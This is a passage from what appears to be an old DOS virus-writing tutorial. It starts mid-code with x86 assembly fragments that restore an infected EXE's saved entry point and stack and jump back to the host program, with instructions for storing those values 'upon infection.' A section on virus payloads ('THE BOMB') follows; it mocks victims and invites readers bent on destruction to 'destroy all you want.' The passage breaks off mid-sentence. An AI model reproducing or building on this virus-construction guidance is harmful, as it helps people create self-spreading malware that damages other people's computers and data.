mov sti db
sp, word ptr cs:[bp+StackSave]
0eah SEG:OFF ExeWhereToJump: dd 0 StackSave: dd 0
; JMP FAR PTR
ExeWhereToJump2 dd 0 StackSave2 dd 0 Upon infection, the initial CS:IP and SS:SP should be stored in ExeWhereToJump2 and StackSave2, respectively. They should then be moved to ExeWhereToJump and StackSave before restoration of the program. This restoration may be easily accomplished with a series of MOVSW instructions. Some like to clear all the registers prior to the JMP/RET, i.e. they issue a bunch of XOR instructions. If you feel happy and wish to waste code space, you are welcome to do this, but it is unnecessary in most instances. ÄÄÄÄÄÄÄÄ THE BOMB ÄÄÄÄÄÄÄÄ "The horror! The horror!" - Joseph Conrad, The Heart of Darkness What goes through the mind of a lowly computer user when a virus activates? What terrors does the unsuspecting victim undergo as the computer suddenly plays a Nazi tune? How awful it must be to lose thousands of manhours of work in an instant! Actually, I do not support wanton destruction of data and disks by virii. It serves no purpose and usually shows little imagination. For example, the world-famous Michelangelo virus did nothing more than overwrite sectors of the drive with data taken at random from memory. How original. Yawn. Of course, if you are hell-bent on destruction, go ahead and destroy all you want, but just remember that this portion of the virus is usually the only part seen by "end-users" and distinguishes it from others. The best